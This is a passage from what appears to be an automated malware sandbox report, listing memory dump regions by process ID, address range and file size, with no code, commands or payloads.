                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/3376-200-0x0000000000417F26-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3376-197-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                    • memory/3376-239-0x00000000051D0000-0x00000000051D1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/3576-172-0x0000000000BF0000-0x0000000000C0F000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      124KB

                                                                                                                                                                                                                                                    • memory/3576-173-0x0000000000C10000-0x0000000000C11000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/3576-188-0x0000000000C30000-0x0000000000C32000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                    • memory/3576-171-0x0000000000BE0000-0x0000000000BE1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/3576-169-0x00000000006B0000-0x00000000006B1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/3576-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3588-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3676-339-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3948-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3956-356-0x00007FF8620B0000-0x00007FF8620B1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/3956-333-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3960-299-0x0000028D2DDD0000-0x0000028D2DDEB000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      108KB

                                                                                                                                                                                                                                                    • memory/3960-300-0x0000028D30600000-0x0000028D30706000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                    • memory/3960-265-0x0000028D2DCE0000-0x0000028D2DD51000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                    • memory/3960-183-0x00007FF6A2B74060-mapping.dmp
                                                                                                                                                                                                                                                    • memory/3988-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4068-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4108-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4144-232-0x0000000005490000-0x0000000005491000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4144-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4144-249-0x0000000002D50000-0x0000000002D7C000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      176KB

                                                                                                                                                                                                                                                    • memory/4144-219-0x0000000000B40000-0x0000000000B41000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4144-255-0x0000000007B40000-0x0000000007B41000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4164-327-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4164-348-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4172-329-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4176-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4176-251-0x0000000005010000-0x0000000005020000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                    • memory/4176-263-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4176-233-0x0000000000F10000-0x0000000000F11000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4176-254-0x000000000A2F0000-0x000000000A2F1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4176-243-0x0000000005670000-0x0000000005671000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4176-248-0x00000000057E0000-0x00000000057E1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4248-250-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4248-240-0x0000000000730000-0x0000000000731000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4248-269-0x0000000007630000-0x000000000766F000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      252KB

                                                                                                                                                                                                                                                    • memory/4248-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4400-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4408-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4432-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4752-361-0x0000000000417E3A-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4752-369-0x0000000004DB0000-0x00000000053B6000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                    • memory/4784-285-0x0000000004FD0000-0x0000000004FD1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/4784-272-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4852-368-0x0000000000400000-0x00000000005E6000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.9MB

                                                                                                                                                                                                                                                    • memory/4852-367-0x0000000000750000-0x000000000077F000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      188KB

                                                                                                                                                                                                                                                    • memory/4852-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4900-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4960-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4976-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4988-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/4996-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5012-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5012-340-0x00000000051C0000-0x00000000051C1000-memory.dmp
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                    • memory/5024-288-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5044-317-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5188-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5236-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5268-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5312-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5520-365-0x0000000000402F68-mapping.dmp
                                                                                                                                                                                                                                                    • memory/5608-366-0x0000000000000000-mapping.dmp